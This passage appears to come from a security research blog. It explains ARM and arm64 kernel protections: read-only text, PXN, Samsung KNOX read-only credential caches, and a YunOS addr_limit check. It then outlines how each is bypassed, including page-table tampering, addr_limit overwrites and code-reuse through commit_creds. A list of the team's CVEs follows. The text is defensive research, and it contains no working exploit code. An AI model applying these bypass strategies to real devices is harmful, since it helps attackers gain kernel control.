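The APX / AP[1:0] table above can be turned into a small lookup to check a section descriptor by hand. This is a sketch, not kernel code: decode_section_perms and struct perms are hypothetical, and the bit positions (AP[1:0] at bits 11:10, APX at bit 15) are taken from the ARMv7 short-descriptor section format, which is also where the Linux PMD_SECT_* masks point.

```c
#include <stdint.h>

/* Bit positions from the ARMv7 short-descriptor section format. */
#define SECT_AP0 (UINT32_C(1) << 10) /* AP[0]; Linux names this PMD_SECT_AP_WRITE */
#define SECT_AP1 (UINT32_C(1) << 11) /* AP[1]; Linux names this PMD_SECT_AP_READ */
#define SECT_APX (UINT32_C(1) << 15) /* AP[2], aka APX */

struct perms {
    const char *privileged;
    const char *user;
};

/* Hypothetical decoder for the APX / AP[1:0] table above. */
struct perms decode_section_perms(uint32_t desc)
{
    static const struct perms table[8] = {
        /* APX = 0 */
        { "No access",  "No access"  },
        { "Read/write", "No access"  },
        { "Read/write", "Read-only"  },
        { "Read/write", "Read/write" },
        /* APX = 1 */
        { "Reserved",   "Reserved"   }, /* shown as "–" in the table */
        { "Read-only",  "No access"  },
        { "Read-only",  "Read-only"  },
        { "Read-only",  "Read-only"  },
    };
    unsigned ap  = (desc >> 10) & 0x3;
    unsigned apx = (desc >> 15) & 0x1;
    return table[(apx << 2) | ap];
}
```

Feeding it SECT_APX | SECT_AP0, the same combination as .prot in ro_perms, selects the bracketed row: read-only for privileged code and no access for user mode.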

For arm64, the difference is that it has a 3-level page table by default, for the obvious reason that the virtual address space is much bigger. A section (while still being a PMD) is therefore a second-level entry. It is sometimes also called a “block”. The attributes available for a block are:

Source: http://armv8-ref.codingbelief.com/en/chapter_d4/d43_3_memory_attribute_fields_in_the_vmsav8-64_translation_table_formats_descriptors.html

It has only two bits for access permissions, noted as AP, and the mapping is simpler than arm:

  AP   Unprivileged (EL0)   Privileged (EL1/2/3)
  00   No access            Read and write
  01   Read and write       Read and write
  10   No access            Read-only
  11   Read-only            Read-only

Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.den0024a/BABCEADG.html

It is quite clear that we need to set AP[1] for read-only. So we have the following code in arch/arm64/mm/mmu.c:

#ifdef CONFIG_DEBUG_RODATA
void mark_rodata_ro(void)
{
        create_mapping_late(__pa(_stext), (unsigned long)_stext,
                                (unsigned long)_etext - (unsigned long)_stext,
                                PAGE_KERNEL_EXEC | PTE_RDONLY);
}
#endif
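
The effect of OR-ing in the read-only bit can be checked on a bare descriptor value. The sketch below assumes the two AP bits of the table above sit at descriptor bits [7:6], with the upper one selecting read-only (the bit Linux names PTE_RDONLY); the DESC_* macros and helper functions are hypothetical names, not kernel API.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed stage-1 descriptor bits in the ARMv8 VMSAv8-64 format. */
#define DESC_AP_USER   (UINT64_C(1) << 6) /* lower AP bit: EL0 access allowed */
#define DESC_AP_RDONLY (UINT64_C(1) << 7) /* upper AP bit: read-only */

/* True if EL1 may write through this descriptor. */
bool desc_kernel_writable(uint64_t desc)
{
    return (desc & DESC_AP_RDONLY) == 0;
}

/* True if EL0 has any access through this descriptor. */
bool desc_user_accessible(uint64_t desc)
{
    return (desc & DESC_AP_USER) != 0;
}

/* What mark_rodata_ro() achieves for kernel text: AP goes from 00 to 10. */
uint64_t desc_make_readonly(uint64_t desc)
{
    return desc | DESC_AP_RDONLY;
}
```

Starting from AP = 00 (kernel read/write, no user access), desc_make_readonly() yields AP = 10, the "No access / Read-only" row. Clearing that single bit again is exactly what the page table attack described in this post aims for.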

One attack against kernel read-only protection is to modify the kernel page table and change the permissions of the corresponding entries. This requires a bug that leads to a kernel write, a controlled bit flip or code execution. Note that Samsung has TrustZone/Hypervisor components that protect the page table, which are discussed in later sections. An info-leak is not needed in this case, since the “template” of the kernel page table is a static object whose address is determined at link time. The location is assigned to init_mm as its initial value in mm/init-mm.c:

struct mm_struct init_mm = {
  .mm_rb    = RB_ROOT,
  .pgd    = swapper_pg_dir,
  ...
};

The value of swapper_pg_dir varies from arch to arch. For both arm and arm64, they are defined in head.S. For arm:

#define PG_DIR_SIZE 0x4000  // aka 4 pages
  .globl  swapper_pg_dir
  .equ  swapper_pg_dir, KERNEL_RAM_VADDR - PG_DIR_SIZE

And for arm64:

#define SWAPPER_DIR_SIZE  (3 * PAGE_SIZE)
...
  .globl  swapper_pg_dir
  .equ  swapper_pg_dir, KERNEL_RAM_VADDR - SWAPPER_DIR_SIZE

So for these two architectures, it starts 4 pages and 3 pages before the kernel text, respectively. Kernel text starts at a relatively fixed location on most devices (or at least for specific SoCs), so we can predict where this critical kernel data structure begins.
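
Given a known kernel text base, the prediction is a single subtraction. A minimal sketch, assuming 4 KiB pages on arm64; the function names are hypothetical, and the addresses in the note below are illustrative values rather than ones taken from a specific device:

```c
#include <stdint.h>

#define ARM_PG_DIR_SIZE        UINT64_C(0x4000)      /* from the arm head.S excerpt */
#define ARM64_PAGE_SIZE        UINT64_C(0x1000)      /* assumes 4 KiB pages */
#define ARM64_SWAPPER_DIR_SIZE (3 * ARM64_PAGE_SIZE) /* from the arm64 head.S excerpt */

/* swapper_pg_dir = KERNEL_RAM_VADDR - PG_DIR_SIZE (arm) */
uint64_t swapper_pg_dir_arm(uint64_t kernel_ram_vaddr)
{
    return kernel_ram_vaddr - ARM_PG_DIR_SIZE;
}

/* swapper_pg_dir = KERNEL_RAM_VADDR - SWAPPER_DIR_SIZE (arm64) */
uint64_t swapper_pg_dir_arm64(uint64_t kernel_ram_vaddr)
{
    return kernel_ram_vaddr - ARM64_SWAPPER_DIR_SIZE;
}
```

With an illustrative arm text base of 0xC0008000 this gives 0xC0004000, and with an illustrative arm64 base of 0xFFFFFFC000080000 it gives 0xFFFFFFC00007D000.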

Besides CONFIG_DEBUG_RODATA, PXN is another very important security feature that has been enabled in recent kernel versions. By the time Android L was released, PXN had been enabled on all arm64 devices. Note that the PXN bit is also present on 32-bit arm since ARMv7, but is seldom used.

PXN on arm64 was introduced into the Linux kernel by commit 8e620b0476696e9428442d3551f3dad47df0e28f (https://kernel.googlesource.com/pub/scm/linux/kernel/git/jic23/iio/+/8e620b0476696e9428442d3551f3dad47df0e28f). It basically sets the PXN bit in every permission template for user-space, as well as the UXN/PXN bits for non-executable pages. This makes sure that every user-space page is mapped with the PXN bit set, which mitigates ret2usr attacks:

-#define PAGE_NONE             _MOD_PROT(pgprot_default, PTE_NG | PTE_XN | PTE_RDONLY)
-#define PAGE_SHARED           _MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_XN)
...
-#define PAGE_KERNEL_EXEC      _MOD_PROT(pgprot_default, PTE_DIRTY)
+#define PAGE_NONE             _MOD_PROT(pgprot_default, PTE_NG | PTE_PXN | PTE_UXN | PTE_RDONLY)
+#define PAGE_SHARED           _MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)
+#define PAGE_SHARED_EXEC      _MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_PXN)
...
+#define PAGE_KERNEL_EXEC      _MOD_PROT(pgprot_default, PTE_UXN | PTE_DIRTY)

-#define __PAGE_NONE           __pgprot(_PAGE_DEFAULT | PTE_NG | PTE_XN | PTE_RDONLY)
-#define __PAGE_SHARED         __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_XN)
...
-#define __PAGE_READONLY_EXEC  __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_RDONLY)
+#define __PAGE_NONE           __pgprot(_PAGE_DEFAULT | PTE_NG | PTE_PXN | PTE_UXN | PTE_RDONLY)
+#define __PAGE_SHARED         __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)
...
+#define __PAGE_READONLY_EXEC  __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_RDONLY)
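
What the new templates mean for each privilege level can be read off a page table entry with two predicates. This is a sketch with hypothetical helper names; the bit positions (PTE_USER at bit 6, PTE_PXN at bit 53, PTE_UXN at bit 54) follow the arm64 definitions in the Linux headers and are re-declared here so the example stands alone.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_USER (UINT64_C(1) << 6)  /* EL0 may access the page */
#define PTE_PXN  (UINT64_C(1) << 53) /* privileged execute-never */
#define PTE_UXN  (UINT64_C(1) << 54) /* unprivileged execute-never */

/* True if EL1 (the kernel) could fetch instructions from this mapping. */
bool privileged_can_execute(uint64_t pte)
{
    return (pte & PTE_PXN) == 0;
}

/* True if EL0 (user-space) could fetch instructions from this mapping. */
bool user_can_execute(uint64_t pte)
{
    return (pte & PTE_USER) != 0 && (pte & PTE_UXN) == 0;
}
```

A PAGE_SHARED_EXEC-style entry (PTE_USER | PTE_PXN) stays executable for user-space but not for the kernel, which is the property that stops a hijacked kernel pointer from jumping into user-mapped shellcode.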

Just like the read-only bits, PXN can also be disabled. But keep in mind that the PXN bits are set in the user virtual address space, whose page tables are dynamically allocated, so unlike the kernel ones, you will need a good kernel read bug to locate the entry to be manipulated. Usually, once you have both read and write, there is really no need for code execution, so this is not very practical in a real exploit.

Vendors

Samsung
Samsung has been a pioneer in Android security hardening over the past years. It was actively involved in enabling SELinux (SEAndroid) for Android, implemented multiple security hardening measures in the kernel, and invented KNOX Active Protection, the first TrustZone (TIMA)/Hypervisor-based active protection for the kernel.

Take kernel modules as an example. Since the Galaxy S4 (or maybe even earlier), Samsung has implemented lkmauth (loadable kernel module authentication) based on TIMA (TrustZone-based Integrity Measurement Architecture). Getting root privilege is not enough to load a kernel module: each module must pass a mandatory digital signature verification that happens in TrustZone instead of the normal-world OS. This means that even if an attacker compromises the kernel and gains arbitrary read/write, he/she still cannot load a kernel module for convenient kernel code execution.

However, lkmauth still had its weakness, which was pointed out in multiple public sessions, including:

Advanced Bootkit Techniques on Android, Zhangqi Chen & Di Shen, SyScan360 2014
Adaptive Android Kernel Live Patching, Tim Xia & Yulong Zhang, HITBSecConf 2016
It was pointed out that patching the code of lkmauth() itself can bypass the logic and allow a kernel module to be loaded. The underlying problem is that the trusted computing base is not really trustworthy (kernel text can be compromised). Samsung has fixed this weakness since the Galaxy S5 by introducing a TIMA-protected page table and read-only kernel text/data into the kernel. It was a surprise that this weakness was mentioned again in the latter session in 2016. Per the slides, the device demonstrated was a Galaxy S4, which may explain why lkmauth() could still be patched.

Besides kernel module authentication, Samsung has enforced KNOX Active Protection (KAP) since the 5.1.1 ROMs for the Galaxy S6/S6 Edge. This seems to be a reaction to the release of PingPong root. In that version of KAP, Samsung not only protected the page table, but also took crucial kernel objects such as credentials into consideration. For example, a dedicated cache (kmem_cache) is created for credential objects, and all pages assigned to that cache are marked read-only for the kernel. In kernel/cred.c:

void __init cred_init(void)
{
  /* allocate a slab in which we can store credentials */
  cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred),
             0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
#ifdef  CONFIG_RKP_KDP
  if(rkp_cred_enable) {
    cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
        0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, cred_ctor);
    if(!cred_jar_ro) {
      panic("Unable to create RO Cred cache\n");
    }

    tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
        0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, sec_ctor);
    if(!tsec_jar) {
      panic("Unable to create RO security cache\n");
    }

    rkp_call(RKP_CMDID(0x42),(unsigned long long )cred_jar_ro->size,(unsigned long long)tsec_jar->size,0,0,0);
  }
#endif  /* CONFIG_RKP_KDP */
}

The cred_ctor() and sec_ctor() routines are dummy constructors that make sure the RO cred/security caches are not merged (SLUB merge) with other caches. The cache names are critical here, since they are hard-coded in the SLUB implementation. In mm/slub.c:

#define check_cred_cache(s,r)     \
do {              \
  if ((s->name) && (!strcmp(s->name,CRED_JAR_RO) || !strcmp(s->name,TSEC_JAR) || !strcmp(s->name,VFSMNT_JAR) )) \
    return r;   \
} while (0)
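
Stripped of the macro, the check is a plain name comparison. The sketch below is hypothetical: it assumes CRED_JAR_RO and TSEC_JAR expand to the strings passed to kmem_cache_create() in cred_init(), and it leaves out VFSMNT_JAR because its value is not shown in the excerpts here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Assumed values, taken from the kmem_cache_create() calls in cred_init(). */
#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR    "tsec_jar"

/* Hypothetical helper: true if a cache with this name gets special treatment. */
bool is_protected_cache(const char *name)
{
    if (name == NULL)
        return false;
    return strcmp(name, CRED_JAR_RO) == 0 || strcmp(name, TSEC_JAR) == 0;
}
```

Because the decision hangs on the name alone, the regular "cred_jar" cache is not matched, while anything created under one of the protected names would be.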

When the two “_ro” caches are created, allocate_slab, the slab page allocation routine underneath them, is also modified to assign dedicated pages to the read-only caches:

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
  struct page *page;
  struct kmem_cache_order_objects oo = s->oo;
#ifdef CONFIG_RKP_KDP
  void *virt_page = NULL;
#endif /*CONFIG_RKP_KDP*/
...
#ifdef CONFIG_RKP_KDP
  if (s->name &&
    (!strcmp(s->name, CRED_JAR_RO) ||
    !strcmp(s->name, TSEC_JAR)||
    !strcmp(s->name, VFSMNT_JAR))) {

    virt_page = rkp_ro_alloc();
    if(!virt_page)
      goto def_alloc;

    page = virt_to_page(virt_page);
    oo = s->min;
  } else {
def_alloc:
#endif /*CONFIG_RKP_KDP*/
...
#ifdef CONFIG_RKP_KDP
  }
#endif /*CONFIG_RKP_KDP*/
  if (kmemcheck_enabled && page
    && !(s->flags & (SLAB_NOTRACK | DEBUG_DEFAULT_FLAGS))) {
...
#ifdef CONFIG_RKP_KDP
  /*
   * We modify the following so that slab alloc for protected data
   * types are allocated from our own pool.
   */
  if (s->name)  {
    u64 sc,va_page;
    va_page = (u64)__va(page_to_phys(page));

    if(!strcmp(s->name, CRED_JAR_RO)){
      for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
        rkp_call(RKP_CMDID(0x50),va_page,0,0,0,0);
        va_page += PAGE_SIZE;
      }
    }
    ...
  }
#endif
  return page;
}

With the pages read-only to the kernel, any allocation or modification of these objects must be done by calling the hyp component. This helps mitigate conventional DKOM exploits. So far, this is the most effective mitigation we’ve seen in Android. The best option for bypassing it might be a code-reuse attack, which, however, can be further mitigated through validation in tz/hyp.

Besides these “high-end” mitigations, Samsung also customized some syscalls to restrict post-exploit activities. Take fork/execve as an example. These two are the syscalls underlying “system”, a very common routine that an exploit uses after privilege escalation. So Samsung added an additional check in execve (fs/exec.c):

SYSCALL_DEFINE3(execve,
    const char __user *, filename,
    const char __user *const __user *, argv,
    const char __user *const __user *, envp)
{
  struct filename *path = getname(filename);
  int error = PTR_ERR(path);
  ...
    if(CHECK_ROOT_UID(current)){
      if(sec_restrict_fork()){
        PRINT_LOG("Restricted making process. PID = %d(%s) "
                "PPID = %d(%s)\n",
        current->pid, current->comm,
        current->parent->pid, current->parent->comm);
        return -EACCES;
      }
    }
  ...
}

For any root process, sec_restrict_fork() checks whether it originated from /data. In general, this directory is the only place a user application can start from. Samsung hopes this can stop rooting applications from spawning new processes, in most cases a daemon running as root. But since they failed to protect some critical data structures used inside sec_restrict_fork(), bypassing this check is far easier than bypassing a tz/hyp-assisted protection.
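
The idea of an origin check can be sketched as a path-prefix test. This is not Samsung's implementation, which is not shown in this post; path_is_under is a hypothetical helper, and it does no symlink or ".." resolution.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: true if `path` is `dir` itself or lies below it.
 * The character after the prefix must be '/' or the end of the string,
 * so "/database" is not treated as being under "/data".
 */
bool path_is_under(const char *path, const char *dir)
{
    size_t n = strlen(dir);
    if (strncmp(path, dir, n) != 0)
        return false;
    return path[n] == '/' || path[n] == '\0';
}
```

A check of this kind is only as trustworthy as the data it reads: if the structures holding the executable's path live in ordinary writable kernel memory, an attacker with kernel write can simply change the answer.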

Others
Some mitigations have also been seen from other manufacturers of Android devices. Besides system partition write protection, which seems to be the favourite of most vendors, a lot of effort has also gone into preventing devices from being rooted. The most ineffective approach we have seen is to set up inotify on certain files, like /system/xbin/su. Simply killing the notifier works around this. But recently we’ve seen something more interesting in YunOS, a customized Android ROM from Alibaba.

One of the generic routes we take for rooting is modifying the addr_limit of the current task’s thread_info structure. This makes the kernel treat the whole virtual address space (or sometimes just enough of it) as “USER_DS”, so read/write operations in that address range are not restricted for certain syscalls, like pipe_read and pipe_write. In the kernel of YunOS, we noticed the following code in el0_svc_naked:

The symbol el0_svc_naked is the syscall entry of Linux on arm64. YunOS added a call to ext_security_pre_check before actually heading into the syscall. Apparently something is checked there. The function looks like this:

The first basic block extracts addr_limit from the current context and checks it against the standard USER_DS value, 0x8000000000 (1 << 39). If it is not the expected value, a SIGKILL is sent to the calling process. Since SIGKILL can’t be masked, the calling process is forcibly killed (which may lead to a panic if it happens in the middle of an exploit). This is by far the most effective exploit mitigation we have seen without tz/hyp assistance. However, it can’t stop the following two scenarios:

A vulnerability, or a set of vulnerabilities, giving direct kernel read/write
Pure code-reuse attack

Vulnerabilities that lead to direct kernel read/write are quite hard to find now, but the latter is still achievable. Besides commit_creds, there are still quite a few routines that can conveniently be used to modify the credentials of a task. Controlling a certain function entry with 1 or 2 arguments would be more than enough.
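
The pre-syscall check described above boils down to one comparison. The following user-space sketch only models the logic: struct fake_thread_info and pre_syscall_check are hypothetical names, and the real ext_security_pre_check lives in the YunOS kernel and delivers SIGKILL instead of returning a flag.

```c
#include <stdbool.h>
#include <stdint.h>

#define USER_DS_ARM64 (UINT64_C(1) << 39) /* 0x8000000000, the value quoted above */

/* Stand-in for the one thread_info field the check looks at. */
struct fake_thread_info {
    uint64_t addr_limit;
};

/* Returns true if the syscall may proceed, false if the task would be killed. */
bool pre_syscall_check(const struct fake_thread_info *ti)
{
    return ti->addr_limit == USER_DS_ARM64;
}
```

An exploit that has raised addr_limit fails this test on its next syscall, which is why the two scenarios listed above matter: neither of them needs to touch addr_limit at all.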

Vulnerability Research is a Journey: CVEs Found by KeenLab

2016-05-31T03:08:15.000Z

By a partial estimate, as of May 2016 KeenLab has found a total of 152 critical vulnerabilities with CVE IDs, ranging from mainstream operating systems to browsers and applications.

Among the vulnerabilities we discovered, 13 were used directly in our 8 Pwn2Own winning categories over the past few years.

CVE-2007-0071 was nominated for best client vulnerability at the Pwnie Awards 2008, the first time a Chinese researcher appeared on the Pwnie nomination list.

CVE-2010-3333 affected all versions of Microsoft Office Word at the time and had a huge impact that year.

CVE-2015-3636 could root most Android devices in 2015. It was nominated for best privilege escalation vulnerability at the Pwnie Awards 2015 and was also recognized in academic circles. We shared our research at ACM CCS 2015, Black Hat 2015, USENIX WOOT 2015, etc.

CVE-2014-1303 and CVE-2014-1314 helped us pwn Safari on OS X in 2014, the first time in Pwn2Own history that a 64-bit browser was pwned on a 64-bit platform.

CVE-2015-2435 and CVE-2015-2455 not only helped us win the Flash and Reader categories at Pwn2Own 2015, but also made us the first team in Pwn2Own history to get SYSTEM privilege on Windows using TTF vulnerabilities. These two vulnerabilities demonstrate KeenLab’s research strength in Windows fonts as well as the Windows kernel. CVE-2015-2455 was also nominated for best privilege escalation vulnerability at the Pwnie Awards 2015.

CVE-2016-1815 and its exploit gained root privilege on the latest OS X El Capitan at Pwn2Own 2016. The vulnerability resides in closed-source core graphics pipeline components of all Apple graphics drivers, including those for the newest chipsets, and with our advanced exploitation approach we used a single vulnerability to break the Apple sandbox and get root.

In recent years, KeenLab has been shifting its research focus from PC to mobile. While we continue to discover a large number of high-quality vulnerabilities on PC, our research output on mobile platforms is also outstanding.

Here is the list of CVEs:

Microsoft

CVE-2014-2819 (Pwn2Own 2014 Flash sandbox bypass on Windows 8.1)
Internet Explorer Elevation of Privilege Vulnerability
https://technet.microsoft.com/en-us/library/security/MS14-051

CVE-2015-2435 (Pwn2Own 2015 Flash sandbox bypass with System EoP on Windows 8.1)
TrueType Font Parsing Vulnerability
https://technet.microsoft.com/library/security/MS15-080

CVE-2015-2455 (Pwn2Own 2015 Reader sandbox bypass with System EoP on Windows 8.1 / Pwnie 2015 nomination)
TrueType Font Parsing Vulnerability
https://technet.microsoft.com/library/security/MS15-080

CVE-2016-0176 (Pwn2Own 2016 Edge sandbox bypass with System EoP on Windows 10)
Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability
https://technet.microsoft.com/library/security/MS16-062

CVE-2010-3333
MICROSOFT WORD RTF FILE PARSING STACK BUFFER OVERFLOW VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx

CVE-2007-2931
MSN Messenger Video Conversation Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/Bulletin/MS07-054.mspx

CVE-2008-1091
Microsoft Office RTF Parsing Engine Memory Corruption Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx

CVE-2008-3471
Microsoft Office Excel BIFF File Format Parsing Stack Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-057.mspx

CVE-2008-4027
Microsoft Office RTF Consecutive Drawing Object Parsing Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-084/

CVE-2008-4028
Microsoft Office RTF Drawing Object Heap Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-072.mspx

CVE-2008-4837
Microsoft Office Word Document Table Property Stack Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-072.mspx

CVE-2009-1130
Microsoft Office PowerPoint Notes Container Heap Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS09-017.mspx

CVE-2009-0563
Microsoft Word Document Stack Based Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx

CVE-2009-1530
Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-038/

CVE-2009-1531
Microsoft Internet Explorer onreadystatechange Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-039/

CVE-2009-1918
Microsoft Internet Explorer getElementsByTagName Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-047/

CVE-2009-1133
Microsoft Remote Desktop Client Arbitrary Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-057/

CVE-2009-1920
Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-062/

CVE-2009-2502
MICROSOFT WINDOWS GDI+ TIFF FILE PARSING BUFFER OVERFLOW VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx

CVE-2010-0244
Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-011/

CVE-2010-0491
MICROSOFT INTERNET EXPLORER ‘ONREADYSTATECHANGE’ USE AFTER FREE VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx

CVE-2010-1900
Microsoft Office Word sprmCMajority Record Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-150/

CVE-2010-1901
MICROSOFT OFFICE RTF PARSING ENGINE MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=877

CVE-2010-1902
MICROSOFT WORD RTF FILE PARSING HEAP BUFFER OVERFLOW VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=876

CVE-2016-0193
Scripting Engine Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS16-052

CVE-2015-2383
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-065

CVE-2015-1753
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-056

CVE-2015-1689
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1691
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1718
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1657
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-032

CVE-2015-0056
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-018

CVE-2015-0039
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-009

CVE-2015-0066
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-009

CVE-2014-6375
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-080

CVE-2014-6339
Internet Explorer ASLR Bypass Vulnerability
https://technet.microsoft.com/library/security/MS14-065

CVE-2014-4130
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-056

CVE-2014-2773
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-035

CVE-2014-0267
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-010

CVE-2016-1646
Out-of-bounds read in V8
http://googlechromereleases.blogspot.com/2016/03/stable-channel-update_24.html

CVE-2010-2297
Table layout crash bug from wushi
https://code.google.com/p/chromium/issues/detail?id=42723

CVE-2010-4206
chrome_55000000!WebCore::FEBlend::apply Memory corruption
https://code.google.com/p/chromium/issues/detail?id=60688

CVE-2014-8299
MTK TOCTTOU memory corruption
http://2014.zeronights.org/assets/files/slides/racingwithdroids.pdf

CVE-2016-2443
Qualcomm MDP escalation of privilege
https://source.android.com/security/bulletin/2016-05-01.html

CVE-2016-0811
libmediaplayerservice infoleak
https://source.android.com/security/bulletin/2016-02-01.html

CVE-2015-6637
misc-sd escalation of privilege
https://source.android.com/security/bulletin/2016-01-01.html

CVE-2015-6612
libmedia escalation of privilege
https://source.android.com/security/bulletin/2015-11-01.html

CVE-2015-6620
libstagefright escalation of privilege
https://source.android.com/security/bulletin/2015-12-01.html

CVE-2015-6622
Android Native Frameworks Library infoleak
https://source.android.com/security/bulletin/2015-12-01.html

CVE-2014-9410
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-4324
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-4321
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-0976
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-0975
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2015-3854
Permission leak in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

CVE-2015-3855
Permission leak in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

CVE-2015-3856
Denial of service in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

Apple

CVE-2013-5228 (Mobile Pwn2Own 2013 iOS 7)
Apple iOS Safari DocumentOrderedMap Remote Code Execution Vulnerability
https://support.apple.com/en-us/HT202897

CVE-2014-1303 (Pwn2Own 2014 Safari on OS X)
Apple Safari Heap Buffer Overflow Remote Code Execution Vulnerability
https://support.apple.com/zh-cn/HT202941

CVE-2014-1314 (Pwn2Own 2014 OS X sandbox bypass)
Apple OS X WindowServer Sandbox Escape Vulnerability
https://support.apple.com/en-us/HT202966

CVE-2016-1859 (Pwn2Own 2016 Tencent Security Team Shield Safari on OS X)
Multiple memory corruption issues were addressed through improved memory handling in WebKit
https://support.apple.com/en-us/HT206565

CVE-2016-1804 (Pwn2Own 2016 Tencent Security Team Shield sandbox bypass on OS X)
Multi-Touch memory corruption
https://support.apple.com/en-us/HT206567

CVE-2016-1857 (Pwn2Own 2016 Tencent Security Team Sniper Safari on OS X)
Multiple memory corruption issues were addressed through improved memory handling in WebKit
https://support.apple.com/en-us/HT206565

CVE-2016-1815 (Pwn2Own 2016 Tencent Security Team Sniper sandbox bypass on OS X)
IOAcceleratorFamily memory corruption
https://support.apple.com/zh-cn/HT206567

CVE-2009-1690
MULTIPLE VENDOR WEBKIT ERROR HANDLING USE AFTER FREE VULNERABILITY
http://support.apple.com/kb/ht3613

CVE-2010-0047
Apple WebKit innerHTML element Substitution Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-029/

CVE-2010-0053
Apple WebKit CSS run-in Attribute Rendering Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-030/

CVE-2010-0050
Apple Webkit Blink Event Dangling Pointer Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-031/

CVE-2010-0048
Apple Webkit Anchor Tag Mouse Click Event Dispatch Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-146/

CVE-2010-0049
Apple WebKit RTL LineBox Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-152/

CVE-2010-1119
Apple Webkit Attribute Child Removal Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-091/

CVE-2010-1392
Apple Webkit Button First-Letter Style Rendering Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-154/

CVE-2010-1396
Apple Webkit Option Element ContentEditable Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-092/

CVE-2010-1397
Apple Webkit DOCUMENT_POSITION_DISCONNECTED Attribute Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-095/

CVE-2010-1398
